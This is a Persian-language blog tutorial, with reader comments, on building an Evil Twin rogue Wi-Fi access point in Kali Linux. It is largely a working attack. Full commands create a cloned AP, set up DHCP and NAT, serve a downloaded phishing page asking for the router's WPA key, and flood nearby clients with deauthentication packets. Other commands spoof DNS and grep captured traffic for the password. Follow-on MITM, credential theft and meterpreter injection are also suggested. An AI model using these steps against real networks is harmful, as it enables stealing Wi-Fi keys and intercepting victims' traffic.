سایبریت

ساخت اکسس پوینت Evil Twin

یک اکسس پوینت جعلی (Fake AP) یک اکسس پوینت وایرلس است که بدون داشتن مجوز صریح از مدیر شبکه لوکال، توسط یک کارمند خوب و یا یک هکر مخرب بر روی آن شبکه ایجادشده است. در این مقاله می‌خواهیم به ساخت اکسس پوینت Evil Twin بپردازیم.

اکسس پوینت جعلی (Fake AP) وای فای اغلب با این نام‌ها شناخته می‌شود:

  1. اکسس پوینت Rogue
  2. اکسس پوینت Evil Twin

تمام روش‌هایی که ما برای هک وای فای بررسی کردیم بسیار آهسته هستند و گاهی در آن شکست می‌خوریم. اما با استفاده از حمله Fake AP در شبکه وای فای می‌توانید کلید اکسس پوینت هدف را به دست بیاورید و حتی از کلاینت‌های شبکه دسترسی بگیرید.

تا قبل از Kali Linux 1.x برای ایجاد اکسس پوینت Fake AP و اتصال اینترفیس با اینترفیس ماشین مجازی از ابزار brctl استفاده می‌کردیم. اما ازآنجاکه درKali Linux 2.0  به بعد دیگر brctl پشتیبانی نمی‌شود و همچنین dhcp3-server به isc-dhcp-server تغییر کرده است، نمی‌توانیم از اسکریپت‌های اتوماتیک که بر اساس آن‌ها طراحی‌شده‌اند استفاده کنیم زیرا ناسازگاری و مشکل بسیار زیادی را ایجاد می‌کنند.

در این مقاله نحوه ساخت اکسس پوینت Evil Twin یا ایجاد یک Rogue AP (اکسس پوینت سرکش) را نشان می‌دهیم و اینکه چگونه می‌توانید از آن استفاده کنید تا کلاینت را هدف قرار دهید و به اهداف موردنظر بپردازید. اجرای حمله Rogue AP بسیار کارآمدتر از حمله بروت فورس شبکه وایرلس است زیرا در این حمله می‌توانید سناریوهای فیشینگ، شنود شبکه و حتی دسترسی گرفتن از کلاینت‌ها را اجرا کنید.

فیشینگ همیشه به‌عنوان یکی از ساده‌ترین روش‌ها برای دستیابی به اطلاعات شخصی به نظر می‌رسد. فیشینگ به روشی گفته می‌شود برای تحت تأثیر قرار دادن یک شخص برای انجام کارهای غیرارادی است. درحالی‌که شبکه Rogue هیچ‌چیز خاصی ندارد و فقط یک شبکه ساده وایرلس جعلی (Fake AP) است اما از همه مهم‌تر صفحات فیشینگ هستند که کل ترافیک شبکه به آن هدایت می‌شود.

Rogue AP چیست؟

به‌طور خلاصه ما یک اکسس پوینت جعلی (Fake AP) ایجاد می‌کنیم. سپس مسیریابی ترافیک را تعریف و در صورت نیاز آن را هدایت خواهیم کرد. پس‌ازآن موضوع صفحه فیشینگ (یا حملات دیگری) است که کلاینت‌ها با آن تعامل برقرار می‌کنند.

حمله rogue AP انواع مختلفی دارد، شما می‌توانید زمانی که به شبکه هدف دسترسی فیزیکی دارید یک دیوایس Raspberry Pi به کابل اترنت شبکه متصل کنید و اطلاعات شبکه را شنود کنید. یا اینکه با استفاده از کابل اترنت به شبکه هدف متصل شوید و یک اکسس پوینت جعلی ایجاد کنید و بین اکسس پوینت جعلی و شبکه اترنت Bridge کنید تا یک پلی بین کلاینت‌ها و اکسس پوینت جعلی شما ایجاد شود. به این صورت می‌توانید تمام فایروال‌های شبکه را دور بزنید و ترافیک کاربران متصل به اکسس پوینت جعلی را شنود کنید. که در اینجا rogue AP یک AP درون یک شبکه محسوب می‌شود و اجازه شنود شبکه و حملات MITM را به مهاجم می‌دهد.

حمله Evil Twin نیز درواقع یکی از انواع حملات rogue AP است که در آن از مهندسی اجتماعی به‌منظور فریب دادن کلاینت‌ها برای اتصال به اکسس پوینت جعلی ما استفاده می‌شود. یک Evil Twin دقیقاً همان مک آدرسی را دارد که اکسس پوینت اصلی دارد و همین امر موجب می‌شود تا تشخیص آن دشوار شود. بعد از اتصال کلاینت و دسترسی او به اینترنت، می‌توانیم حملات فیشینگ، سمت کاربر، شنود ترافیک و حملات MITM را اجرا کنیم.

شرح حمله

مرحله 1: ساخت Evil Twin

محیط را برای پیدا کردن اکسس پوینت هدف اسکن کنید. یک اکسس پوینت با همان ESSID و شماره کانال ایجاد کنید. با استفاده از airbase-ng برای اکسس پوینت هدف، یک Evil-TWIN ایجاد کنید.

مرحله 2: اسارت وایرلس

اکنون کلاینت به‌صورت مکرر از سمت اکسس پوینت خودش deauthenticate شده است و شما صبر می‌کنید تا او به اکسس پوینت شما متصل شود.

مرحله 3: طعمه هکر

کلاینت اکنون به اکسس پوینت Fake AP متصل شده است و ممکن است مرورگر خودش را باز کند.

مرحله 4: کلید را به دست بیاورید

در مروگر کلاینت یک صفحه وب هشدار می‌دهد و می‌گوید “رمز عبور WPA را برای دانلود و ارتقاء سیستم‌عامل روتر وارد کنید”.

مرحله 5: پایان حمله و یا شروع حملات پیشرفته‌تر

کلاینت با واردکردن کلید به صفحه آپدیت روتر هدایت می‌شود و رمز عبور در دیتابیس هکر ذخیره می‌شود.

ابزارهای مورداستفاده در این حمله

  • airmon-ng, airodump-ng, airbase-ng, aireplay-ng
  • dnsmasq
  • iptables
  • apache، mysql

 

آماده‌سازی حمله

“به من شش ساعت زمان بده که درختی را قطع کنم، و من چهار ساعت اول را صرف تیز کردن تبر خواهم کرد” – آبراهام لینکلن

آماده‌سازی این حمله بیشترین زمان را می‌طلبد زیرا شامل نصب ابزارها، پیکربندی و اجرای خود rogue AP بر روی سرور apache و مدیریت جریان ترافیک شبکه می‌باشد. اگرچه بخشی از حمله فقط قطع اتصال کلاینت هدف است، اما بقیه به‌صورت خودکار انجام می‌شود.

ایجاد Rogue AP با استفاده از airbase-ng

ابزارهای aircrack-ng،apache ،mysql ، iptables در کالی لینوکس از پیش نصب‌شده‌اند. فقط لازم است dnsmasq که یک DHCP سرور است برای اختصاص IP آدرس به کلاینت نصب کنیم. (درگذشته از isc-dhcp-server برای اجرای حمله استفاده می‌کردیم، اما این ابزار دیگر ناسازگار است.)

برای نصب dnsmasq در ترمینال دستور زیر را اجرا کنید:

apt update
apt install dnsmasq -y

ابتدا مخازن بسته آپدیت می‌شود و در ادامه آخرین نسخه dnsmasq را در کالی نصب خواهد شد.

مرحله 1: جمع‌آوری اطلاعات

توصیه می‌کنیم اطلاعات قربانی را از قبل ذخیره کنید. این کار به‌سادگی باعث صرفه‌جویی در وقت شما می‌شود و در لحظه‌های حساس به شما کمک می‌کند.

حالت مانیتور را فعال کنید

airmon-ng start wlan0

جمع‌آوری اطلاعات با airodump-ng

اکنون کارت شما در حالت مانیتور است، ابزار airodump-ng را اجرا کنید:

airodump-ng wlan0mon

دستور airbase-ng - ساخت اکسس پوینت Evil Twin

زمانی که AP هدف شما در خروجی airodump-ng ظاهر می‌شود CTRL+C را فشار دهید و این سه مورد زیر را در یک ویرایشگر متنی یادداشت کنید.

BSSID: 64:64:B3:BE:BE:07
ESSID: wifi
Channel: 11

ناسازگاری airmon-ng با network-manager (اختیاری)

شاید در حین قرار دادن کارت وایرلس در حالت مانیتور به مشکل برخورد کنید. زیرا ابزار network-manager نمی‌خواهد کنترل دستگاه‌های شبکه خود را از دست بدهد. شما به‌محض اینکه کارت وایرلس را در حالت مانیتور قرار دهید، آن را به‌زور وارد حالت managed می‌کنید. در حین تست نفوذ نیز شما نمی‌خواهید حالت‌ها را به‌طورکلی به جلو و عقب تغییر دهید. بنابراین برای جلوگیری از تداخل قبل از فعال کردن حالت مانیتور دستور airmon-ng check kill را اجرا کنید.

مطالعه کنید
نصب و راه اندازی DHCP server در کالی لینوکس

از طرف دیگر ممکن است بخواهید از network-manager برای اتصال به شبکه استفاده کنید. پس بهتر هست به مدیر شبکه بگویید که کارت وایرلس ما را مدیریت نکند. به‌این‌ترتیب دیگر نیازی نیست قبل از قرار دادن کارت وایرلس در حالت مانیتور، network-manager را kill کنید. برای این کار می‌توانید نام اینترفیس یا MAC آدرس کارت وایرلس خود را در network-manager ثبت کنید تا آن را نادیده بگیرد.

فایل پیکربندی پیش‌فرض network-manager را بازکنید و خط‌وط زیر را به انتهای آن اضافه کنید.

nano /etc/NetworkManager/NetworkManager.conf
---------------------------------------------
[keyfile]
unmanaged-devices=interface-name:wlan0mon

شما همچنین می‌توانید چندین اینترفیس یا مک آدرس را معرفی کنید. باید نام اینترفیس یا مک آدرس کارت‌های وایرلستان (دستور ifconfig) را جایگزین آن کنید. برای مثال:

unmanaged-devices=mac:00:22:68:1c:59:b1;mac:00:1E:65:30:D1:C4;interface-name:eth0

در آخر سرویس network-manager را مجدداً راه‌اندازی کنید:

service network-manager restart

افزایش TX-power به حداکثر قدرت (اختیاری)

TX-power مخفف قدرت انتقال است. به‌طور پیش‌فرض روی 20 dBm (دسی‌بل) یا 100 مگاوات تنظیم‌شده است. در ایالات‌متحده، کارت وایرلس شما می‌تواند با 30 دسی‌بل (1000 مگاوات) قدرت کار کند.

هر کشوری مجموعه مقررات WiFi خود را دارد. برای افزایش قدرت کارت، کشور (منطقه) را به US تنظیم کنید.

ifconfig wlan0mon down
iw reg set US
ifconfig wlan0mon up
iwconfig wlan0mon

می‌توانیم در انتهای خط دوم Tx-Power=30 dBm را ببینیم. اکنون قدرت کارت ما 30 دسی‌بل یا 1000 مگاوات است و می‌تواند بر تمام اکسس پوینت‌های محدوده غلبه کند.

نکته: افزایش قدرت به حداکثر توان کارت وایرلس شما بستگی دارد، برای مثال قدرت کارت WN-722N فقط 20dbm است. بعضی از کارت‌های جدید می‌توانند قدرت را تا 2000 مگاوات یا چهار برابر میزان قانونی برسانند.

چرا ما نیاز به تغییر منطقه داریم تا بتوانیم باقدرت 1000 مگاوات کارکنیم؟

در کشورها مجموعه مقررات WiFi متفاوت است و دستگاه‌های وایرلس از محدوده قدرت و فرکانس خاصی برخوردار هستند. به همین دلیل شما باید منطقه خود را تغییر دهید تا به کارت اجازه دهید با نهایت فرکانس و قدرت کار کنند.

توجه کنید که برای انجام حمله Rogue AP باید AP جعلی ما نزدیک‌تر یا قوی‌تر از AP هدف باشد. بنابراین با افزایش قدرت کارت وایرلس‌تان، دیگر نیازی به نزدیک بودن به قربانی نخواهید داشت.

مرحله 2: ایجاد اکسس پوینت جعلی (Fake AP) با airbase-ng

برای ساخت اکسس پوینت Evil Twin باید یک اکسس پوینت جعلی به همراه یک مک آدرس تقلبی را با استفاده از دستور airbase-ng ایجاد کنید:

airbase-ng -e "wifi" -c 11 -a 00:12:23:34:45:56 -P wlan0mon
-----------------------------------------------------------
14:12:30  Created tap interface at0
14:12:30  Trying to set MTU on at0 to 1500
14:12:30  Trying to set MTU on wlan0mon to 1800
14:12:31  Access Point with BSSID 00:12:23:34:45:56 started.

ابزار airbase-ng به‌طور پیش‌فرض یک اینترفیس (at0) به‌عنوان یک اینترفیس کابلی مجازی برای bridging/routing ترافیک شبکه ایجاد می‌کند. می‌توانید با دستور زیر آن را ببینید.

ifconfig at0 up
ifconfig at0

حال باید IP آدرس را برای اینترفیس Fake ap مان (at0) تنظیم کنیم تا IP دهی شبکه برای قربانی فعال شود.

ifconfig at0 up 192.168.2.1 netmask 255.255.255.0
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1

اکنون ما باید سرورهای apache و DHCP را پیکربندی کنیم تا اکسس پوینت جعلی ما IP آدرس را به کلاینت هدف (قربانی) اختصاص دهد تا او بتوانند به صفحه وب ما دسترسی پیدا کنند.

ابتدا با دستور زیر یک دایرکتوری بانام fakeap بسازید و فایل‌های پیکربندی زیر را در آن‌ها ایجاد کنید.

mkdir ~/Desktop/fakeap
cd ~/Desktop/fakeap

مرحله 3: پیکربندی dnsmasq

فایل کانفیگ dnsmasq را ایجاد کنید و مقادیر زیر را در آن وارد کنید.

cd ~/Desktop/fakeap
nano dnsmasq.conf
-------------------------------------------------------
interface=at0 #Fake AP Interface name
dhcp-range=192.168.2.2,192.168.2.30,255.255.255.0,12h
dhcp-option=3,192.168.2.1
dhcp-option=6,192.168.2.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

مطمئن شوید که اینترفیس Fake AP خود را وارد کنید و در آخر خط کامنت را پاک‌کنید.

  • interface=at0: اینترفیس Fake ap شما (at0 اینترفیس ایجادشده توسط airbase-ng است)
  • dhcp-range=192.168.2.2,192.168.2.30,12h: رنج آدرس IP کلاینت‌های متصل به Fake AP است و subnet mask شبکه 255.255.255.0 است که زمان اجاره IP به‌طور پیش‌فرض 12 ساعت است.
  • dhcp-option=3,192.168.2.1: عدد 3 کد مربوط به Default Gateway است و به همراه IP آدرس آن
  • dhcp-option=6,192.168.2.1: عدد 6 مربوط به DNS Server و به همراه IP آدرس
  • server=8.8.8.8: سرور عمومی DNS ، در اینجا 8.8.8.8 DNS گوگل است.
  • Log-queries: فعال کردن گزارشات query
  • Log-dhcp: فعال کردن گزارشات DHCP
  • listen-address=127.0.0.1: ابزار Dnsmasq روی ترافیک هدایت‌شده در localhost گوش خواهد کرد. بنابراین در صورت لزوم اینترنت در دستگاه ما نیز کار می‌کند.

دستور dnsmasq را به همراه فایل کانفیگ و در حالت debug اجرا کنید تا تمام ترافیک قربانی به سرور apache شما هدایت شود. برای اختصاص IP آدرس به قربانیان dnsmasq را اجرا کنید.

dnsmasq -C dnsmasq.conf -d

اجرای dnsmasq - ساخت اکسس پوینت Evil Twin

در صورت بروز مشکل در سرور dhcp، پروسه DHCP در حال اجرا را بکشید و مجدداً dnsmasq را اجرا کنید.

killall dnsmasq dhcpd isc-dhcp-server

نکته: سایت‌هایی که از HSTS استفاده می‌کنند و دارای یکcertificate  معتبر هستند یا اینکه HSTS توسط مرورگر اجرا شود، قابل ریدایرکت نیستند.

مرحله 4: هدایت ترافیک

اگر بخواهیم یک حمله MITM نیز انجام دهیم باید دستورات زیر را وارد کنیم تا قربانی بتواند به اینترنت دسترسی داشته باشد و ما نیز به‌عنوان هکر بتوانیم ترافیک ارسالی او را شنود کنیم. در بالا دیدید که با دستور ifconfig یک IP آدرس و subnet mask به اینترفیس at0 اختصاص دادیم. اکنون باید با اینترفیس اترنت (eth0) به اینترنت متصل شویم و ترافیک اینترنت را به اینترفیس at0 هدایت کنیم.

مطالعه کنید
بهترین کارت شبکه برای تست نفوذ وایرلس

به‌عبارت‌دیگر، ما به اینترفیسی (eth0) نیاز داریم که دارای اتصال اینترنت باشد و ترافیک را از این اینترفیس به اینترفیس اکسس پوینت جعلی (at0) هدایت کنیم.

توجه: اگر در vmware از کالی استفاده می‌کنید باید در ماشین اصلی (ویندوز) با کابل به اینترنت متصل باشید. زیرا اگر اتصال از طریق WiFi در میزبان برقرارشده باشد، vm آن را به‌عنوان کارت اترنت می‌شناسد و این مسئله باعث ایجاد ناسازگاری می‌شود. همچنین تنظیمات شبکه vm باید در حالت bridged باشد.

برای این کار از ابزار iptables برای تنظیم یک قانون (rule) فایروال استفاده خواهیم کرد تا تمام ترافیک را از طریق اینترفیس at0 هدایت کنیم. بنابراین dnsmasq می‌تواند درخواست‌های ارسالی قربانی را پردازش کند.

iptables --flush && iptables --table nat --flush
iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

به این دو پارامتر در دستور بالا توجه داشته باشید:

  • –out-interface: اینترفیسی که ترافیک از آن هدایت می‌شود، در اینجا eth0 (کابل اترنت)
  • –in-interface: اینترفیسی که ترافیک به آن هدایت می‌شود، در اینجا at0 (اکسس پوینت جعلی Fake AP)

اکنون برای اجرای حمله فیشینگ باید مسیردهی ipv4 را غیرفعال کنیم. اگر می‌خواهید قربانی به اینترنت دسترسی داشته باشد و ترافیک او را شنود کنید، باید مسیردهی ipv4 را فعال کنید.

echo 0 > /proc/sys/net/ipv4/ip_forward
  • 0: غیرفعال کردن  ipv4 forwarding
  • 1: فعال کردن  ipv4 forwarding

با واردکردن “1” در فایل ip_forward به سیستم می‌گویید که قوانین تعریف‌شده در iptables را فعال کن و ترافیک اینترنت را هدایت کن. این قوانین دائمی نیستند و فقط تا ریبوت بعدی سیستم باقی می‌مانند.

ما برای انجام فیشینگ باید مقدار را 0 وارد می‌کنیم. زیرا قبل از گرفتن رمز WPA نباید قربانی به اینترنت دسترسی داشته باشد و هر آدرس که در مرورگر وارد می‌کند باید با صفحه فیشینگ ما مواجه شود.

کمی پیشرفته‌تر: تنها درصورتی‌که بخواهید حمله MITM, DNS Spoofing, ARP Spoofing را انجام بدید و ترافیک قربانی را شنود کنید، باید حتماً ترافیک را هدایت کنید و بعدازآن از ettercap استفاده کنید.

مرحله 5: پیکربندی Apache

اکنون ما باید سرور apache را پیکربندی کنیم تا قربانی بعد از اتصال به اکسس پوینت جعلی ما بتوانند به صفحه وب ما دسترسی پیدا کنند. یک ترمینال جدید بازکنید و سرویس آپاچی را اجرا کنید:

service apache2 start

شما باید صفحات وب موردنیاز را در دایرکتوری apache قرار دهید. فایل rogue_AP.zip را از آدرس https://git.io/JU4LG دانلود کنید و آن را در دسکتاپ ذخیره کنید.

rm -rf /var/www/html/*
unzip rogue_AP.zip -d /var/www/html/

دستور بالا محتوای فایل rogue_AP.zip را در دایرکتوری apache اکسترکت می‌کند. هنگامی‌که قربانی مرورگر را باز کرد، به‌طور خودکار به صفحه پیش‌فرض index.html هدایت می‌شود.

برای اینکه بررسی کنید همه‌چیز کار می‌کند، آدرس 192.168.2.1 را در مرورگر خود بازکنید و ببینید آیا صفحه جعلی موجود است.

پیکربندی apache - ساخت اکسس پوینت Evil Twin

اکنون کافی است ترافیک شبکه را به Gateway IP که صفحه وب جعلی ما در آن قرار دارد تغییر دهید. بنابراین می‌توانیم درخواست‌های ترافیک را spoof (جعل) کنیم.  در یک ترمینال جدید دستور زیر را وارد کنید.

dnsspoof -i at0

توجه داشته باشید که این حمله برای سایت‌های غیر HSTS یا آدرس‌هایی که هنوز توسط مرورگر باز نشده است  کار خواهد کرد. اکنون برای شنود کلید واردشده توسط قربانی از tcpflow استفاده خواهیم کرد.

apt install tcpflow
tcpflow -i any -C -g port 80 | grep -i "password1="

اتفاقی که در اینجا رخ می‌دهد این است که ما ترافیکی را که در شبکه انجام می‌شود کاملاً در دست داریم. در صفحه فیشینگ ما یک درخواست POST وجود دارد که شامل مقدار پسورد است. در اینجا با tcpflow داده‌های درخواست را دریافت می‌کنیم و خروجی را به grep برای پیدا کردن خط “password1=‎” فیلتر می‌کنیم.

مرحله 6: اجرای حمله Deauthentication

حمله ما اکنون آماده است فقط صبر کنید تا کلاینت متصل شود. در بیشتر موارد، کلاینت ممکن است قبلاً به AP اصلی خودش متصل باشد. شما باید با ابزار aireplay-ng کلاینت را از AP خودش جدا کنید.

aireplay-ng -0 0 -a [BSSID target] wlan0mon
aireplay-ng -0 0 -a 64:64:B3:BE:BE:07 wlan0mon

ما از گزینه 0 یعنی deauth استفاده می‌کنیم تا تمام کلاینت‌ها از BSSID قربانی جدا شوند و به AP ما وصل شوند، زیرا نام ESSID اکسس پوینت جعلی ما شبیه نام AP قربانی است و کلید آن از نوع open است.

مرحله 7: شنود اطلاعات قربانی

فرض کنید که قربانی به Rogue AP متصل شده است و به صفحه Phishing هدایت می‌شود. او متوجه می‌شود که سیستم‌عامل روتر وی به روز نیست و نیاز به به‌روزرسانی دارد. به‌محض اینکه کلید را در قسمت پسورد وارد کند، اطلاعات برای سرور ما ارسال می‌شود و در ترمینال tcpflow می‌توانیم آن را ببینیم:

همان‌طور که می‌بینید کلید WPA عبارت wifi123456 است.

اکسس پوینت Evil Twin هم‌اکنون آماده است

اکنون‌که قربانی به Fake AP ما متصل است، می‌توانیم قدم‌های بعدی را برای شناسایی فعالیت‌هایش پیش ببریم. گاهی قربانی درحال ارتکاب عمل غیراخلاقی (مانند فروش فیلم‌های غیراخلاقی کودکان) یا ارتکاب جرم است و ما طبق درخواست مشتری می‌توانیم با تحقیق و بررسی شواهد را جمع‌آوری کنیم.

ما می‌توانیم از ابزار Ettercap برای انجام یک حمله man-in-the middle استفاده کنیم. به‌این‌ترتیب، ما می‌توانیم ترافیک را از این کاربر جدا، آنالیز و حتی تزریق کنیم. به‌عبارت‌دیگر، چون او به AP ما متصل است، ما تقریباً دسترسی کامل به داده‌های ارسالی و دریافتی او داریم.

ما همچنین می‌توانیم ایمیل و پسوردها را از برنامه‌ها و شبکه‌های دیگر قربانی جدا کنیم. ما حتی می‌توانیم یک meterpreter یا listener را به سیستم او تزریق inject کنیم تا دسترسی و کنترل بیشتری داشته باشیم.

امیدوارم این آموزش به شما در ساخت اکسس پوینت Evil Twin کمک کند. منتظر مقالات بعدی باشید و اگر سؤالی دارید، در نظرات زیر بپرسید.

4+

دیدگاه‌ها (6)

  • بخش دیدگاه محیط تعامل میان ما و شما است
  • سوالات، پیشنهادات و انتقادات خود را با ما در میان بگذارید
  • شما در بیان نظر خود آزاد هستید و تمامی کامنت ها منتشر می‌شوند

    shp مهمان 28 خرداد 1398

    اینارو مینویسه :
    sudo airmon-ng start wlan0
    [sudo] password for darkcastle:

    Found 3 processes that could cause trouble.
    Kill them using 'airmon-ng check kill' before putting
    the card in monitor mode, they will interfere by changing channels
    and sometimes putting the interface back in managed mode

    PID Name
    534 NetworkManager
    624 wpa_supplicant
    1604 dhclient

    PHY Interface Driver Chipset

    phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

    sudo aireplay-ng --test wlan0mon
    11:42:15 Trying broadcast probe requests...
    11:42:15 Injection is working!
    11:42:17 Found 1 AP

    11:42:17 Trying directed probe requests...
    11:42:17 1C:7E:E5:B7:43:5D - channel: 11 - 'DLink'
    11:42:17 Ping (min/avg/max): 1.115ms/2.111ms/4.850ms Power: -58.33
    11:42:17 30/30: 100%

      معین کاردانی بنیان گذار 8 تیر 1398

      سلام دوست عزیز
      بله کارت وایرلس شما قابلیت Injection دارد

    shp مهمان 28 خرداد 1398

    هر چی نگاه میکنم چیست کارت وایرلس خودمو تو این لیست نمیبینم (این لیست چیپست های سازگار با لینوکس هه که قابلیت هک و مانیتورینگ رو دارن ) :
    Atheros AR9271
    Ralink RT3070
    Ralink RT3572
    Ralink RT5370N
    Realtek RTL8812AU
    Realtek RTL88XX

      معین کاردانی بنیان گذار 28 خرداد 1398

      سلام دوست عزیز
      دراینصورت باید یک کارت وایرلس مناسب بخرید
      این مقاله را مطالعه کنید
      https://cybrit.ir/?p=1348

    Shp مهمان 26 خرداد 1398

    اگه کارت وای فای ما قابلیت این کار رو نداشته باشه چطوری معلوم میشه ؟؟؟

      معین کاردانی بنیان گذار 26 خرداد 1398

      سلام دوست عزیز
      برای بررسی قابلیت Injection کارت وایرلس به ترتیب دستورات زیر را وارد کنید
      airmon-ng start wlan0
      aireplay-ng -9 wlan0mon

کتاب تست نفوذ وایرلس با کالی لینوکس

حملات تکنیکی به شبکه وایرلس

۵۰ درصد تخفیف

فقط ۱۲,۵۰۰ تومان

مترجم: معین کاردانی

کتاب تست نفوذ وایرلس با کالی لینوکس